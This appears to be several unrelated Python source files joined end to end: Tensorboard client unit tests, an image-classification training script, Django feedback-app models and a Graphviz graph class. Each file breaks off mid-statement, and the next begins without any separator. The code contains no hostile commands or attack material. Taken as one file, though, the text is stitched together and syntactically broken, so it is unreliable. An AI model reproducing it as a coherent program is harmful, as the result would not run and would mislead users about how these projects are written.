kw["metadata"] @pytest.mark.asyncio async def test_list_tensorboard_time_series_field_headers_async(): client = TensorboardServiceAsyncClient( credentials=ga_credentials.AnonymousCredentials(), ) # Any value that is part of the HTTP/1.1 URI should be sent as # a field header. Set these to a non-empty value. request = tensorboard_service.ListTensorboardTimeSeriesRequest() request.parent = "parent/value" # Mock the actual call within the gRPC stub, and fake the request. with mock.patch.object( type(client.transport.list_tensorboard_time_series), "__call__" ) as call: call.return_value = grpc_helpers_async.FakeUnaryUnaryCall( tensorboard_service.ListTensorboardTimeSeriesResponse() ) await client.list_tensorboard_time_series(request) # Establish that the underlying gRPC stub method was called. assert len(call.mock_calls) _, args, _ = call.mock_calls[0] assert args[0] == request # Establish that the field header was sent. _, _, kw = call.mock_calls[0] assert ("x-goog-request-params", "parent=parent/value",) in kw["metadata"] def test_list_tensorboard_time_series_flattened(): client = TensorboardServiceClient( credentials=ga_credentials.AnonymousCredentials(), ) # Mock the actual call within the gRPC stub, and fake the request. with mock.patch.object( type(client.transport.list_tensorboard_time_series), "__call__" ) as call: # Designate an appropriate return value for the call. call.return_value = tensorboard_service.ListTensorboardTimeSeriesResponse() # Call the method with a truthy value for each flattened field, # using the keyword arguments to the method. client.list_tensorboard_time_series(parent="parent_value",) # Establish that the underlying call was made with the expected # request object values. assert len(call.mock_calls) == 1 _, args, _ = call.mock_calls[0] arg = args[0].parent mock_val = "parent_value" assert arg == mock_val def test_list_tensorboard_time_series_flattened_error(): client = TensorboardServiceClient( credentials=ga_credentials.AnonymousCredentials(), ) # Attempting to call a method with both a request object and flattened # fields is an error. with pytest.raises(ValueError): client.list_tensorboard_time_series( tensorboard_service.ListTensorboardTimeSeriesRequest(), parent="parent_value", ) @pytest.mark.asyncio async def test_list_tensorboard_time_series_flattened_async(): client = TensorboardServiceAsyncClient( credentials=ga_credentials.AnonymousCredentials(), ) # Mock the actual call within the gRPC stub, and fake the request. with mock.patch.object( type(client.transport.list_tensorboard_time_series), "__call__" ) as call: # Designate an appropriate return value for the call. call.return_value = tensorboard_service.ListTensorboardTimeSeriesResponse() call.return_value = grpc_helpers_async.FakeUnaryUnaryCall( tensorboard_service.ListTensorboardTimeSeriesResponse() ) # Call the method with a truthy value for each flattened field, # using the keyword arguments to the method. response = await client.list_tensorboard_time_series(parent="parent_value",) # Establish that the underlying call was made with the expected # request object values. assert len(call.mock_calls) _, args, _ = call.mock_calls[0] arg = args[0].parent mock_val = "parent_value" assert arg == mock_val @pytest.mark.asyncio async def test_list_tensorboard_time_series_flattened_error_async(): client = TensorboardServiceAsyncClient( credentials=ga_credentials.AnonymousCredentials(), ) # Attempting to call a method with both a request object and flattened # fields is an error. with pytest.raises(ValueError): await client.list_tensorboard_time_series( tensorboard_service.ListTensorboardTimeSeriesRequest(), parent="parent_value", ) def test_list_tensorboard_time_series_pager(): client = TensorboardServiceClient(credentials=ga_credentials.AnonymousCredentials,) # Mock the actual call within the gRPC stub, and fake the request. with mock.patch.object( type(client.transport.list_tensorboard_time_series), "__call__" ) as call: # Set the response to a series of pages. call.side_effect = ( tensorboard_service.ListTensorboardTimeSeriesResponse( tensorboard_time_series=[ tensorboard_time_series.TensorboardTimeSeries(), tensorboard_time_series.TensorboardTimeSeries(), tensorboard_time_series.TensorboardTimeSeries(), ], next_page_token="abc", ), tensorboard_service.ListTensorboardTimeSeriesResponse( tensorboard_time_series=[], next_page_token="def", ), tensorboard_service.ListTensorboardTimeSeriesResponse( tensorboard_time_series=[ tensorboard_time_series.TensorboardTimeSeries(), ], next_page_token="ghi", ), tensorboard_service.ListTensorboardTimeSeriesResponse( tensorboard_time_series=[ tensorboard_time_series.TensorboardTimeSeries(), tensorboard_time_series.TensorboardTimeSeries(), ], ), RuntimeError, ) metadata = () metadata =
<gh_stars>0 # Copyright (c) 2018-2019, NVIDIA CORPORATION # Copyright (c) 2017- Facebook, Inc # # All rights reserved. # # Redistribution and use in source and binary forms, with or without # modification, are permitted provided that the following conditions are met: # # * Redistributions of source code must retain the above copyright notice, this # list of conditions and the following disclaimer. # # * Redistributions in binary form must reproduce the above copyright notice, # this list of conditions and the following disclaimer in the documentation # and/or other materials provided with the distribution. # # * Neither the name of the copyright holder nor the names of its # contributors may be used to endorse or promote products derived from # this software without specific prior written permission. # # THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS" # AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE # IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE ARE # DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT HOLDER OR CONTRIBUTORS BE LIABLE # FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL # DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR # SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER # CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, # OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE # OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE. import argparse import random from copy import deepcopy import signal import torch.backends.cudnn as cudnn import torch.distributed as dist import torch.nn.parallel import torch.optim import torch.utils.data import torch.utils.data.distributed import torchvision.transforms as transforms import torchvision.datasets as datasets from torch.nn.parallel import DistributedDataParallel as DDP import image_classification.logger as log from image_classification.smoothing import LabelSmoothing from image_classification.mixup import NLLMultiLabelSmooth, MixUpWrapper from image_classification.dataloaders import * from image_classification.training import * from image_classification.utils import * from image_classification.models import ( resnet50, resnext101_32x4d, se_resnext101_32x4d, efficientnet_b0, efficientnet_b4, efficientnet_widese_b0, efficientnet_widese_b4, ) import dllogger def available_models(): models = { m.name: m for m in [ resnet50, resnext101_32x4d, se_resnext101_32x4d, efficientnet_b0, efficientnet_b4, efficientnet_widese_b0, efficientnet_widese_b4, ] } return models def add_parser_arguments(parser, skip_arch=False): parser.add_argument("data", metavar="DIR", help="path to dataset") parser.add_argument( "--data-backend", metavar="BACKEND", default="dali-cpu", choices=DATA_BACKEND_CHOICES, help="data backend: " + " | ".join(DATA_BACKEND_CHOICES) + " (default: dali-cpu)", ) parser.add_argument( "--interpolation", metavar="INTERPOLATION", default="bilinear", help="interpolation type for resizing images: bilinear, bicubic or triangular(DALI only)", ) if not skip_arch: model_names = available_models().keys() parser.add_argument( "--arch", "-a", metavar="ARCH", default="resnet50", choices=model_names, help="model architecture: " + " | ".join(model_names) + " (default: resnet50)", ) parser.add_argument( "-j", "--workers", default=5, type=int, metavar="N", help="number of data loading workers (default: 5)", ) parser.add_argument( "--epochs", default=90, type=int, metavar="N", help="number of total epochs to run", ) parser.add_argument( "--run-epochs", default=-1, type=int, metavar="N", help="run only N epochs, used for checkpointing runs", ) parser.add_argument( "--early-stopping-patience", default=-1, type=int, metavar="N", help="early stopping after N epochs without validation accuracy improving", ) parser.add_argument( "--image-size", default=None, type=int, help="resolution of image" ) parser.add_argument( "-b", "--batch-size", default=256, type=int, metavar="N", help="mini-batch size (default: 256) per gpu", ) parser.add_argument( "--optimizer-batch-size", default=-1, type=int, metavar="N", help="size of a total batch size, for simulating bigger batches using gradient accumulation", ) parser.add_argument( "--lr", "--learning-rate", default=0.1, type=float, metavar="LR", help="initial learning rate", ) parser.add_argument( "--lr-schedule", default="step", type=str, metavar="SCHEDULE", choices=["step", "linear", "cosine"], help="Type of LR schedule: {}, {}, {}".format("step", "linear", "cosine"), ) parser.add_argument("--end-lr", default=0, type=float) parser.add_argument( "--warmup", default=0, type=int, metavar="E", help="number of warmup epochs" ) parser.add_argument( "--label-smoothing", default=0.0, type=float, metavar="S", help="label smoothing", ) parser.add_argument( "--mixup", default=0.0, type=float, metavar="ALPHA", help="mixup alpha" ) parser.add_argument( "--optimizer", default="sgd", type=str, choices=("sgd", "rmsprop") ) parser.add_argument( "--momentum", default=0.9, type=float, metavar="M", help="momentum" ) parser.add_argument( "--weight-decay", "--wd", default=1e-4, type=float, metavar="W", help="weight decay (default: 1e-4)", ) parser.add_argument( "--bn-weight-decay", action="store_true", help="use weight_decay on batch normalization learnable parameters, (default: false)", ) parser.add_argument( "--rmsprop-alpha", default=0.9, type=float, help="value of alpha parameter in rmsprop optimizer (default: 0.9)", ) parser.add_argument( "--rmsprop-eps", default=1e-3, type=float, help="value of eps parameter in rmsprop optimizer (default: 1e-3)", ) parser.add_argument( "--nesterov", action="store_true", help="use nesterov momentum, (default: false)", ) parser.add_argument( "--print-freq", "-p", default=10, type=int, metavar="N", help="print frequency (default: 10)", ) parser.add_argument( "--resume", default=None, type=str, metavar="PATH", help="path to latest checkpoint (default: none)", ) parser.add_argument( "--static-loss-scale", type=float, default=1, help="Static loss scale, positive power of 2 values can improve amp convergence.", ) parser.add_argument( "--dynamic-loss-scale", action="store_true", help="Use dynamic loss scaling. If supplied, this argument supersedes " + "--static-loss-scale.", ) parser.add_argument( "--prof", type=int, default=-1, metavar="N", help="Run only N iterations" ) parser.add_argument( "--amp", action="store_true", help="Run model AMP (automatic mixed precision) mode.", ) parser.add_argument( "--seed", default=None, type=int, help="random seed used for numpy and pytorch" ) parser.add_argument( "--gather-checkpoints", action="store_true", help="Gather checkpoints throughout the training, without this flag only best and last checkpoints will be stored", ) parser.add_argument( "--raport-file", default="experiment_raport.json", type=str, help="file in which to store JSON experiment raport", ) parser.add_argument( "--evaluate", action="store_true", help="evaluate checkpoint/model" ) parser.add_argument("--training-only", action="store_true", help="do not evaluate") parser.add_argument( "--no-checkpoints", action="store_false", dest="save_checkpoints", help="do not store any checkpoints, useful for benchmarking", ) parser.add_argument("--checkpoint-filename", default="checkpoint.pth.tar", type=str) parser.add_argument( "--workspace", type=str, default="./", metavar="DIR", help="path to directory where checkpoints will be stored", ) parser.add_argument( "--memory-format", type=str, default="nchw", choices=["nchw", "nhwc"], help="memory layout, nchw or nhwc", ) parser.add_argument("--use-ema", default=None, type=float, help="use EMA") parser.add_argument( "--augmentation", type=str, default=None, choices=[None, "autoaugment"], help="augmentation method", ) def prepare_for_training(args, model_args, model_arch): args.distributed = False if "WORLD_SIZE" in os.environ: args.distributed = int(os.environ["WORLD_SIZE"]) > 1 args.local_rank = int(os.environ["LOCAL_RANK"]) else: args.local_rank = 0 args.gpu = 0 args.world_size = 1 if args.distributed: args.gpu = args.local_rank % torch.cuda.device_count() torch.cuda.set_device(args.gpu) dist.init_process_group(backend="nccl", init_method="env://") args.world_size = torch.distributed.get_world_size() if args.seed is not None: print("Using seed = {}".format(args.seed)) torch.manual_seed(args.seed + args.local_rank) torch.cuda.manual_seed(args.seed + args.local_rank) np.random.seed(seed=args.seed + args.local_rank) random.seed(args.seed + args.local_rank) def _worker_init_fn(id): np.random.seed(seed=args.seed + args.local_rank + id) random.seed(args.seed + args.local_rank + id) else: def _worker_init_fn(id): pass if args.static_loss_scale != 1.0: if not args.amp: print("Warning: if --amp is not used, static_loss_scale will be ignored.") if args.optimizer_batch_size < 0: batch_size_multiplier = 1 else: tbs = args.world_size * args.batch_size if args.optimizer_batch_size % tbs != 0: print( "Warning: simulated batch size {} is not divisible by actual batch size {}".format( args.optimizer_batch_size, tbs ) ) batch_size_multiplier = int(args.optimizer_batch_size / tbs) print("BSM: {}".format(batch_size_multiplier)) start_epoch = 0 # optionally resume from a checkpoint if args.resume is not None: if os.path.isfile(args.resume): print("=> loading checkpoint '{}'".format(args.resume)) checkpoint = torch.load( args.resume, map_location=lambda storage, loc: storage.cuda(args.gpu) ) start_epoch = checkpoint["epoch"] best_prec1 = checkpoint["best_prec1"] model_state = checkpoint["state_dict"] optimizer_state = checkpoint["optimizer"] if "state_dict_ema" in checkpoint: model_state_ema = checkpoint["state_dict_ema"] print( "=> loaded checkpoint '{}' (epoch {})".format( args.resume, checkpoint["epoch"] ) ) if start_epoch >= args.epochs: print( f"Launched training for {args.epochs}, checkpoint already run {start_epoch}" ) exit(1) else: print("=> no checkpoint found at '{}'".format(args.resume)) model_state = None model_state_ema = None optimizer_state = None else: model_state = None model_state_ema = None optimizer_state = None loss = nn.CrossEntropyLoss if args.mixup > 0.0: loss = lambda: NLLMultiLabelSmooth(args.label_smoothing) elif args.label_smoothing > 0.0: loss = lambda: LabelSmoothing(args.label_smoothing) memory_format = ( torch.channels_last if args.memory_format == "nhwc" else torch.contiguous_format ) model = model_arch( **{ k: v if k != "pretrained" else v and (not args.distributed or dist.get_rank() == 0) for k, v in model_args.__dict__.items() } ) image_size = ( args.image_size if args.image_size is not None else model.arch.default_image_size ) model_and_loss = ModelAndLoss(model, loss, cuda=True, memory_format=memory_format) if args.use_ema is not None: model_ema = deepcopy(model_and_loss) ema = EMA(args.use_ema) else: model_ema = None ema = None # Create data loaders and optimizers as needed if args.data_backend == "pytorch": get_train_loader = get_pytorch_train_loader get_val_loader = get_pytorch_val_loader elif args.data_backend == "dali-gpu": get_train_loader = get_dali_train_loader(dali_cpu=False) get_val_loader = get_dali_val_loader() elif args.data_backend == "dali-cpu": get_train_loader = get_dali_train_loader(dali_cpu=True) get_val_loader = get_dali_val_loader() elif args.data_backend == "syntetic": get_val_loader = get_syntetic_loader get_train_loader = get_syntetic_loader else: print("Bad databackend picked") exit(1) train_loader, train_loader_len = get_train_loader( args.data, image_size, args.batch_size, model_args.num_classes, args.mixup > 0.0, interpolation = args.interpolation, augmentation=args.augmentation, start_epoch=start_epoch, workers=args.workers, memory_format=memory_format, ) if args.mixup != 0.0: train_loader = MixUpWrapper(args.mixup, train_loader) val_loader, val_loader_len = get_val_loader( args.data, image_size, args.batch_size, model_args.num_classes, False, interpolation = args.interpolation, workers=args.workers, memory_format=memory_format, ) if not torch.distributed.is_initialized() or torch.distributed.get_rank() == 0: logger = log.Logger( args.print_freq, [ dllogger.StdOutBackend( dllogger.Verbosity.DEFAULT, step_format=log.format_step ), dllogger.JSONStreamBackend( dllogger.Verbosity.VERBOSE, os.path.join(args.workspace, args.raport_file), ), ], start_epoch=start_epoch - 1, ) else: logger = log.Logger(args.print_freq, [], start_epoch=start_epoch - 1) logger.log_parameter(args.__dict__, verbosity=dllogger.Verbosity.DEFAULT) logger.log_parameter( {f"model.{k}": v for k, v in model_args.__dict__.items()}, verbosity=dllogger.Verbosity.DEFAULT, ) optimizer = get_optimizer( list(model_and_loss.model.named_parameters()), args.lr, args=args, state=optimizer_state, ) if args.lr_schedule == "step": lr_policy = lr_step_policy( args.lr, [30, 60, 80], 0.1, args.warmup,
<filename>fjord/feedback/models.py from datetime import datetime import urlparse from django.core.cache import cache from django.core.exceptions import ValidationError from django.db import models from elasticutils.contrib.django import Indexable from rest_framework import serializers from tower import ugettext_lazy as _ from product_details import product_details from fjord.base.domain import get_domain from fjord.base.models import ModelBase from fjord.base.util import smart_truncate from fjord.feedback.config import CODE_TO_COUNTRY from fjord.feedback.utils import compute_grams from fjord.search.index import ( register_mapping_type, FjordMappingType, boolean_type, date_type, integer_type, keyword_type, terms_type, text_type) from fjord.search.tasks import register_live_index from fjord.translations.models import get_translation_system_choices from fjord.translations.tasks import register_auto_translation from fjord.translations.utils import compose_key # This defines the number of characters the description can have. We # do this in code rather than in the db since it makes it easier to # tweak the value. TRUNCATE_LENGTH = 10000 class Product(ModelBase): """Represents a product we capture feedback for""" # Whether or not this product is enabled enabled = models.BooleanField(default=True) # Used internally for notes to make it easier to manage products notes = models.CharField(max_length=255, blank=True, default=u'') # This is the name we display everywhere display_name = models.CharField(max_length=20) # We're not using foreign keys, so when we save something to the # database, we use this name db_name = models.CharField(max_length=20) # This is the slug used in the feedback product urls; we don't use # the SlugField because we don't require slugs be unique slug = models.CharField(max_length=20) # Whether or not this product shows up on the dashboard on_dashboard = models.BooleanField(default=True) # System slated for automatic translation, or null if none; # See translation app for details. translation_system = models.CharField( choices=get_translation_system_choices(), null=True, blank=True, max_length=20, ) @classmethod def get_product_map(cls): """Returns map of product slug -> db_name""" products = cls.objects.values_list('slug', 'db_name') return dict(prod for prod in products) @register_auto_translation @register_live_index class Response(ModelBase): """Basic feedback response This consists of a bunch of information some of which is inferred and some of which comes from the source. Some fields are "sacrosanct" and should never be edited after the response was created: * happy * url * description * user_agent * manufacturer * device * created """ # This is the product/channel. # e.g. "firefox.desktop.stable", "firefox.mobile.aurora", etc. prodchan = models.CharField(max_length=255) # Data coming from the user happy = models.BooleanField(default=True) url = models.URLField(blank=True) description = models.TextField(blank=True) # Translation into English of the description translated_description = models.TextField(blank=True) # Data inferred from urls or explicitly stated by the thing saving # the data (webform, client of the api, etc) product = models.CharField(max_length=30, blank=True) channel = models.CharField(max_length=30, blank=True) version = models.CharField(max_length=30, blank=True) locale = models.CharField(max_length=8, blank=True) country = models.CharField(max_length=4, blank=True, null=True, default=u'') manufacturer = models.CharField(max_length=255, blank=True) device = models.CharField(max_length=255, blank=True) # User agent and inferred data from the user agent user_agent = models.CharField(max_length=255, blank=True) browser = models.CharField(max_length=30, blank=True) browser_version = models.CharField(max_length=30, blank=True) platform = models.CharField(max_length=30, blank=True) source = models.CharField(max_length=100, blank=True, null=True, default=u'') campaign = models.CharField(max_length=100, blank=True, null=True, default=u'') created = models.DateTimeField(default=datetime.now) class Meta: ordering = ['-created'] def __unicode__(self): return u'(%s) %s' % (self.sentiment, self.truncated_description) def __repr__(self): return self.__unicode__().encode('ascii', 'ignore') def generate_translation_jobs(self): """Returns a list of tuples, one for each translation job If the locale of this response is English, then we just copy over the description and we're done. If the product of this response isn't set up for auto-translation, then we're done. If we already have a response with this text that's translated, we copy the most recent translation over. Otherwise we generate a list of jobs to be done. .. Note:: This happens in a celery task, so feel free to do what you need to do here. """ # If the text is in English, we copy it over and we're # done. We do this regardless of whether auto-translation is # enabled or not for this product. if self.locale == 'en-US': self.translated_description = self.description self.save() return [] try: prod = Product.objects.get(db_name=self.product) system = prod.translation_system except Product.DoesNotExist: # If the product doesn't exist, then I don't know what's # going on, but we shouldn't create any translation jobs return [] if not system: # If this product isn't set up for translation, don't # translate it. return [] try: # See if this text has been translated already--if so, use # the most recent translation. existing_obj = ( Response.objects .filter(description=self.description) .exclude(translated_description__isnull=True) .exclude(translated_description=u'') .latest('id')) self.translated_description = existing_obj.translated_description self.save() return [] except Response.DoesNotExist: pass return [ # key, system, src language, src field, dst language, dst field (compose_key(self), system, self.locale, 'description', u'en-US', 'translated_description') ] @classmethod def get_export_keys(cls, confidential=False): """Returns set of keys that are interesting for export Some parts of the Response aren't very interesting. This lets us explicitly state what is available for export. Note: This returns the name of *properties* of Response which aren't all database fields. Some of them are finessed. :arg confidential: Whether or not to include confidential data """ keys = [ 'id', 'created', 'sentiment', 'description', 'translated_description', 'product', 'channel', 'version', 'locale_name', 'manufacturer', 'device', 'platform', ] if confidential: keys.extend([ 'url', 'country_name', 'user_email', ]) return keys def save(self, *args, **kwargs): self.description = self.description.strip()[:TRUNCATE_LENGTH] super(Response, self).save(*args, **kwargs) @property def url_domain(self): """Returns the domain part of a url""" return get_domain(self.url) @property def user_email(self): """Associated email address or u''""" if self.responseemail_set.count() > 0: return self.responseemail_set.all()[0].email return u'' @property def sentiment(self): if self.happy: return _(u'Happy') return _(u'Sad') @property def truncated_description(self): """Shorten feedback for list display etc.""" return smart_truncate(self.description, length=70) @property def locale_name(self, native=False): """Convert a locale code into a human readable locale name""" locale = self.locale if locale in product_details.languages: display_locale = 'native' if native else 'English' return product_details.languages[locale][display_locale] return locale @property def country_name(self, native=False): """Convert a country code into a human readable country name""" country = self.country if country in CODE_TO_COUNTRY: display_locale = 'native' if native else 'English' return CODE_TO_COUNTRY[country][display_locale] return country @classmethod def get_mapping_type(self): return ResponseMappingType @classmethod def infer_product(cls, platform): if platform == u'Firefox OS': return u'Firefox OS' elif platform == u'Android': return u'Firefox for Android' elif platform in (u'', u'Unknown'): return u'' return u'Firefox' @register_mapping_type class ResponseMappingType(FjordMappingType, Indexable): @classmethod def get_model(cls): return Response @classmethod def get_mapping(cls): return { 'id': integer_type(), 'prodchan': keyword_type(), 'happy': boolean_type(), 'url': keyword_type(), 'url_domain': keyword_type(), 'has_email': boolean_type(), 'description': text_type(), 'description_bigrams': keyword_type(), 'description_terms': terms_type(), 'user_agent': keyword_type(), 'product': keyword_type(), 'channel': keyword_type(), 'version': keyword_type(), 'browser': keyword_type(), 'browser_version': keyword_type(), 'platform': keyword_type(), 'locale': keyword_type(), 'country': keyword_type(), 'device': keyword_type(), 'manufacturer': keyword_type(), 'created': date_type() } @classmethod def extract_document(cls, obj_id, obj=None): if obj is None: obj = cls.get_model().objects.get(pk=obj_id) def empty_to_unknown(text): return u'Unknown' if text == u'' else text doc = { 'id': obj.id, 'prodchan': obj.prodchan, 'happy': obj.happy, 'url': obj.url, 'url_domain': obj.url_domain, 'has_email': bool(obj.user_email), 'description': obj.description, 'description_terms': obj.description, 'user_agent': obj.user_agent, 'product': obj.product, 'channel': obj.channel, 'version': obj.version, 'browser': obj.browser, 'browser_version': obj.browser_version, 'platform': obj.platform, 'locale': obj.locale, 'country': obj.country, 'device': obj.device, 'manufacturer': obj.manufacturer, 'created': obj.created, } # We only compute bigrams for english because the analysis # uses English stopwords, stemmers, ... if obj.locale.startswith(u'en') and obj.description: bigrams = compute_grams(obj.description) doc['description_bigrams'] = bigrams return doc @property def truncated_description(self): """Shorten feedback for dashboard view.""" return smart_truncate(self.description, length=500) @classmethod def get_products(cls): """Returns a list of all products This is cached. """ key = 'feedback:response_products1' products = cache.get(key) if products is not None: return products facet = cls.search().facet('product').facet_counts() products = [prod['term'] for prod in facet['product']] cache.add(key, products) return products @classmethod def get_indexable(cls): return super(ResponseMappingType, cls).get_indexable().reverse() class ResponseEmail(ModelBase): """Holds email addresses related to Responses.""" opinion = models.ForeignKey(Response) email = models.EmailField() class NoNullsCharField(serializers.CharField): """Further restricts CharField so it doesn't accept nulls DRF lets CharFields take nulls which is not what I want. This raises a ValidationError if the value is a null. """ def from_native(self, value): if value is None: raise ValidationError('Value cannot be null') return super(NoNullsCharField, self).from_native(value) class ResponseSerializer(serializers.Serializer): """This handles incoming feedback This handles responses as well as the additional data for response emails. """ happy = serializers.BooleanField(required=True) url = serializers.URLField(required=False, default=u'') description = serializers.CharField(required=True) # Note: API clients don't provide a user_agent, so we skip that and # browser since those don't make sense. # product, channel, version, locale, platform product = NoNullsCharField(max_length=20, required=True) channel = NoNullsCharField(max_length=30, required=False, default=u'') version = NoNullsCharField(max_length=30, required=False, default=u'') locale = NoNullsCharField(max_length=8, required=False, default=u'') platform = NoNullsCharField(max_length=30, required=False, default=u'') country = NoNullsCharField(max_length=4, required=False, default=u'') # device
#------------------------------------------------------------------------------ # Copyright (c) 2009 <NAME> # # Permission is hereby granted, free of charge, to any person obtaining a copy # of this software and associated documentation files (the "Software"), to # deal in the Software without restriction, including without limitation the # rights to use, copy, modify, merge, publish, distribute, sublicense, and/or # sell copies of the Software, and to permit persons to whom the Software is # furnished to do so, subject to the following conditions: # # The above copyright notice and this permission notice shall be included in # all copies or substantial portions of the Software. # # THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR # IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY, # FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE # AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER # LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING # FROM, OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS # IN THE SOFTWARE. #------------------------------------------------------------------------------ """ Defines a base class for many graphs. """ #------------------------------------------------------------------------------ # Imports: #------------------------------------------------------------------------------ import os import logging import tempfile import subprocess from enthought.traits.api import \ HasTraits, Str, List, Instance, Bool, Property, Constant, Button, \ ReadOnly, Dict, TraitListEvent, Int, Enum, on_trait_change from enthought.enable.api \ import Viewport, Container from enthought.enable.tools.api \ import ViewportPanTool, ViewportZoomTool from dot2tex.dotparsing import find_graphviz from node \ import Node from edge \ import Edge from common \ import id_trait, Alias import godot #from util import Serializable FORMATS = ['dot', 'canon', 'cmap', 'cmapx', 'cmapx_np', 'dia', 'fig', 'gd', 'gd2', 'gif', 'hpgl', 'imap', 'imap_np', 'ismap', 'jpe', 'jpeg', 'jpg', 'mif', 'mp', 'pcl', 'pdf', 'pic', 'plain', 'plain-ext', 'png', 'ps', 'ps2', 'svg', 'svgz', 'vml', 'vmlz', 'vrml', 'vtx', 'wbmp', 'xdot', 'xlib', 'bmp', 'eps', 'gtk', 'ico', 'tga', 'tiff'] RENDERERS = ['cairo', 'gd'] FORMATTERS = ['cairo', 'gd', 'gdk_pixbuf'] logger = logging.getLogger(__name__) #------------------------------------------------------------------------------ # "BaseGraph" class: #------------------------------------------------------------------------------ class BaseGraph ( HasTraits ): """ Defines a representation of a graph in Graphviz's dot language """ #-------------------------------------------------------------------------- # Trait definitions. #-------------------------------------------------------------------------- # Optional unique identifier. ID = id_trait # Synonym for ID. name = Alias("ID", desc="synonym for ID") # Used by InstanceEditor # Main graph nodes. nodes = List( Instance(Node) ) # Map if node IDs to node objects. # id_node_map = Dict # Graph edges. edges = List(Instance(Edge)) # Separate layout regions. subgraphs = List(Instance("godot.subgraph.Subgraph")) # Clusters are encoded as subgraphs whose names have the prefix 'cluster'. clusters = List(Instance("godot.cluster.Cluster")) # Node from which new nodes are cloned. default_node = Instance(Node) # Edge from which new edges are cloned. default_edge = Instance(Edge) # Graph from which new subgraphs are cloned. default_graph = Instance(HasTraits) # Level of the graph in the subgraph hierarchy. # level = Int(0, desc="level in the subgraph hierarchy") # Padding to use for pretty string output. padding = Str(" ", desc="padding for pretty printing") # A dictionary containing the Graphviz executable names as keys # and their paths as values. See the trait initialiser. programs = Dict(desc="names and paths of Graphviz executables") # The Graphviz layout program program = Enum("dot", "circo", "neato", "twopi", "fdp", desc="layout program used by Graphviz") # Format for writing to file. format = Enum(FORMATS, desc="format used when writing to file") # Use Graphviz to arrange all graph components. arrange = Button("Arrange All") # Parses the Xdot attributes for all graph components. redraw = Button("Redraw Canvas") #-------------------------------------------------------------------------- # Enable trait definitions. #-------------------------------------------------------------------------- # Container of graph components. component = Instance(Container, desc="container of graph components.") # A view into a sub-region of the canvas. vp = Instance(Viewport, desc="a view of a sub-region of the canvas") #-------------------------------------------------------------------------- # Xdot trait definitions: #-------------------------------------------------------------------------- # For a given graph object, one will typically a draw directive before the # label directive. For example, for a node, one would first use the # commands in _draw_ followed by the commands in _ldraw_. _draw_ = Str(desc="xdot drawing directive") # Label draw directive. _ldraw_ = Str(desc="xdot label drawing directive") #-------------------------------------------------------------------------- # "object" interface: #-------------------------------------------------------------------------- # def __init__(self, **traits): # """ Initialises a new BaseGraph instance. # """ # super(BaseGraph, self).__init__(**traits) # # # Automatically creates all the methods enabling the saving # # of output in any of the supported formats. # for frmt in FORMATS: # self.__setattr__('save_'+frmt, # lambda flo, f=frmt, prog=self.program: \ # flo.write( self.create(format=f, prog=prog) )) # f = self.__dict__['save_'+frmt] # f.__doc__ = '''Refer to the docstring accompanying the 'create' # method for more information.''' def __len__(self): """ Return the order of the graph when requested by len(). @rtype: number @return: Size of the graph. """ return len(self.nodes) def __iter__(self): """ Return a iterator passing through all nodes in the graph. @rtype: iterator @return: Iterator passing through all nodes in the graph. """ for each in self.nodes: yield each def __getitem__(self, node): """ Return a iterator passing through all neighbours of the given node. @rtype: iterator @return: Iterator passing through all neighbours of the given node. """ for each_edge in self.edges: if (each_edge.tail_node == node) or (each_edge.head_node == node): yield each_edge def __str__(self): """ Returns a string representation of the graph in dot language. It will return the graph and all its subelements in string form. """ s = "" padding = self.padding if self.ID: s += "%s {\n" % self.ID else: s += "{\n" # Traits to be included in string output have 'graphviz' metadata. for trait_name, trait in self.traits(graphviz=True).iteritems(): # Get the value of the trait for comparison with the default. value = getattr(self, trait_name) # Only print attribute value pairs if not defaulted. # FIXME: Alias/Synced traits default to None. if ( value != trait.default ) and ( trait.default is not None ): if isinstance( value, basestring ): # Add double quotes to the value if it is a string. valstr = '"%s"' % value else: valstr = str(value) s += "%s%s=%s;\n" % ( padding, trait_name, valstr ) def prepend_padding(s): return "\n".join( [padding + line for line in s.splitlines()] ) for node in self.nodes: s += "%s%s\n" % ( padding, str(node) ) for edge in self.edges: s += "%s%s\n" % ( padding, str(edge) ) for subgraph in self.subgraphs: s += prepend_padding( str( subgraph ) ) + "\n" for cluster in self.clusters: s += prepend_padding( str( cluster ) ) + "\n" s += "}" return s #-------------------------------------------------------------------------- # Trait initialisers: #-------------------------------------------------------------------------- def _default_node_default(self): """ Trait initialiser. """ return Node("default") def _default_edge_default(self): """ Trait initialiser. """ return Edge("tail", "head") def _default_graph_default(self): """ Trait initialiser. """ return godot.cluster.Cluster(ID="cluster_default") def _programs_default(self): """ Trait initaliser. """ progs = find_graphviz() if progs is None: logger.warning("GraphViz's executables not found") return {} else: return progs def _component_default(self): """ Trait initialiser. """ return Container(draw_axes=True, fit_window=False, auto_size=True) def _vp_default(self): """ Trait initialiser. """ vp = Viewport(component=self.component) vp.enable_zoom=True vp.view_position = [-5, -5] vp.tools.append(ViewportPanTool(vp)) return vp #-------------------------------------------------------------------------- # Public interface: #-------------------------------------------------------------------------- def save_dot(self, flo, prog=None): """ Writes a graph to a file. Given a file like object 'flo' it will truncate it and write a representation of the graph defined by the dot object and in the format specified. The format 'raw' is used to dump the string representation of the Dot object, without further processing. The output can be processed by any of graphviz tools, 